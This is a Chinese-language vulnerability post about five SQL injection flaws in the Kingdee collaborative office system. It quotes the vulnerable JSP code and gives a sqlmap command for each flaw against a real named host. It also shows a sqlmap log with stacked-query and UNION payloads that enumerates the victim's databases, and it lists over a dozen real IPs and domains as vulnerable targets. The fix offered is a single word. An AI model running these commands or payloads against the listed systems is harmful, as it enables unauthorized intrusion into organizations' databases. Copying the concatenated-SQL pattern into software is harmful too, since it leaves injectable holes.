首页 » 漏洞 » 金蝶协作办公系统存在五个高危SQL注射

金蝶协作办公系统存在五个高危SQL注射

 

存在漏洞的文件为:

code 区域
/kingdee/Template/TemplateEdit.jsp?RecordID=1

/kingdee/Template/TemplateSave.jsp?FileName=1

/kingdee/DocumentEdit.jsp?RecordID=1&UserName=1

/kingdee/DocumentSave.jsp?RecordID=1&Template=1&Subject=1&Author=1&FileDate=1&FileType=1&HTMLPath=1 RecordID存在漏洞

/kingdee/DocumentShow.jsp?Template=1&UserName=1 Template存在漏洞

以上漏洞均可以使用SQLMAP直接跑出数据:

0x1 /kingdee/Template/TemplateEdit.jsp 部分漏洞代码

code 区域
sysUtil.tools.weboffice.iDBManager2000 DbaObj=new sysUtil.tools.weboffice.iDBManager2000();

if (DbaObj.OpenConnection())

{

String mSql="Select * From Template_File Where RecordID='"+ mRecordID + "'";

try

{

result=DbaObj.ExecuteQuery(mSql);

if (result.next())

{

mRecordID=result.getString("RecordID");

mFileName=result.getString("FileName");

mFileType=result.getString("FileType");

mDescript=result.getString("Descript");

c_class=result.getString("c_class");

def_process=result.getString("def_process");

template_img=result.getString("template_img");

}

code 区域
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateEdit.jsp?RecordID=1"

1.PNG

0x2 /kingdee/Template/TemplateSave.jsp 部分漏洞代码

code 区域
<%

String mRecordID=request.getParameter("RecordID");

String mFileName=request.getParameter("FileName");

String mDescript=request.getParameter("Descript");

String c_class=request.getParameter("c_class");

String def_process=request.getParameter("def_process");

String user_id = PubFunc.toString(session.getAttribute("user_id"));

String default_tmpl = PubFunc.toString(request.getParameter("default_tmpl"));

String template_img = PubFunc.toString(request.getParameter("template_img"));

new Person().set_default_tmpl(default_tmpl,c_class,user_id,"","gj","");



sysUtil.tools.weboffice.iDBManager2000 DbaObj=new sysUtil.tools.weboffice.iDBManager2000();

if (DbaObj.OpenConnection())

{

java.sql.PreparedStatement prestmt=null;

String mSql="Update Template_File Set FileName = '"+ mFileName +"',Descript = '"+ mDescript +"',c_class="+c_class+",def_process='"+def_process+"',template_img='"+template_img+"' Where RecordID='"+ mRecordID +"'";

prestmt =DbaObj.Conn.prepareStatement(mSql);

//DbaObj.Conn.setAutoCommit(true) ;

prestmt.execute();

//DbaObj.Conn.commit();

prestmt.close();

}

DbaObj.CloseConnection();



response.sendRedirect("TemplateList.jsp");

%>

code 区域
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateSave.jsp?FileName=1"

2.png

0x3 /kingdee/DocumentEdit.jsp 部分漏洞代码

code 区域
if (DbaObj.OpenConnection())

{

try

{

String mSql="";

if (!mTemplate.equals(""))

{

TableCtrl tc = new TableCtrl();

String t_mFileType = tc.getFieldValue("Template_File","FileType","RecordID='"+mTemplate+"'");

if (t_mFileType!=null && !t_mFileType.equals(""))

mFileType=t_mFileType;

}

mSql="Select * From Document Where RecordID='"+ mRecordID + "'";

result=DbaObj.ExecuteQuery(mSql);

code 区域
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/DocumentEdit.jsp?RecordID=1&UserName=1"

3.png

0x4 /kingdee/DocumentSave.jsp 部分漏洞代码

code 区域
<%

String mRecordID=request.getParameter("RecordID");

if (mRecordID==null) mRecordID="";

String mTemplate=new String(request.getParameter("Template").getBytes("gbk"));

String mSubject=new String(request.getParameter("Subject").getBytes("gbk"));

String mAuthor=new String(request.getParameter("Author").getBytes("gbk"));

String mFileDate=new String(request.getParameter("FileDate").getBytes("gbk"));

String mFileType=new String(request.getParameter("FileType").getBytes("gbk"));

String mHTMLPath=new String(request.getParameter("HTMLPath").getBytes("gbk"));

String mysql = "";

boolean ishave = false;



sysUtil.tools.weboffice.iDBManager2000 DbaObj=new sysUtil.tools.weboffice.iDBManager2000();

if (DbaObj.OpenConnection())

{

mysql="SELECT * from Document Where RecordID='" + mRecordID + "'";

//...

}

code 区域
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/DocumentSave.jsp?RecordID=1&Template=1&Subject=1&Author=1&FileDate=1&FileType=1&HTMLPath=1" -p RecordID

4.png

0x5 /kingdee/DocumentShow.jsp 部分漏洞代码

code 区域
try {

String mSql="";

if (!mTemplate.equals("")) {

String t_mFileType = db.getFieldValue("Template_File","FileType","RecordID='"+mTemplate+"'");

if (t_mFileType!=null && !t_mFileType.equals(""))

mFileType=t_mFileType;

}

code 区域
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/DocumentShow.jsp?Template=1&UserName=1"

5.png

利用SQLMAP跑出的数据:

code 区域
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateEdit.jsp?RecordID=1" --dbs

data.png

给出几个漏洞案例:

code 区域
http://221.226.149.17:8080/kingdee/login/loginpage.jsp

http://122.139.60.103:800/kingdee/login/loginpage.jsp

http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp

http://222.179.238.182:8082/kingdee/login/loginpage2.jsp

http://222.134.77.23:8080/kingdee/login/loginpage.jsp

http://221.4.245.218:8080/kingdee/login/loginpage.jsp

http://221.226.149.17:8080/kingdee/login/loginpage.jsp

http://220.189.244.202:8080/kingdee/login/loginpage.jsp

http://222.133.44.10:8080/kingdee/login/loginpage.jsp

http://223.95.183.6:8080/kingdee/login/loginpage.jsp

http://61.190.20.51/kingdee/login/loginpage.jsp

http://60.194.110.187/kingdee/login/loginpage.jsp

http://oa.roen.cn/kingdee/login/loginpage.jsp

漏洞证明:

code 区域
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateEdit.jsp?RecordID=1" --dbs

_

___ ___| |_____ ___ ___ {1.0-dev-nongit-20150423}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program



[*] starting at 21:59:58



[21:59:59] [INFO] resuming back-end DBMS 'microsoft sql server'

[21:59:59] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: RecordID (GET)

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries (comment)

Payload: RecordID=1';WAITFOR DELAY '0:0:5'--



Type: UNION query

Title: Generic UNION query (NULL) - 13 columns

Payload: RecordID=1' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(104)+CHAR(81)+CHAR(120)+CHAR(109)+CHAR(90)+CHAR(122)+CHAR(97)+CHAR(81)+CHAR(74)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

---

[22:00:00] [INFO] the back-end DBMS is Microsoft SQL Server

web application technology: JSP

back-end DBMS: Microsoft SQL Server 2005

[22:00:00] [INFO] fetching database names

[22:00:00] [INFO] the SQL query used returns 6 entries

[22:00:00] [INFO] resumed: ghcoa

[22:00:00] [INFO] resumed: ghtest

[22:00:00] [INFO] resumed: master

[22:00:00] [INFO] resumed: model

[22:00:00] [INFO] resumed: msdb

[22:00:00] [INFO] resumed: tempdb

available databases [6]:

[*] ghcoa

[*] ghtest

[*] master

[*] model

[*] msdb

[*] tempdb



[22:00:00] [INFO] fetched data logged to text files under 'C:/Users/Administrator/.sqlmap/output/oa.guanhao.com'



[*] shutting down at 22:00:00

修复方案:

过滤

原文链接:金蝶协作办公系统存在五个高危SQL注射,转载请注明来源!

0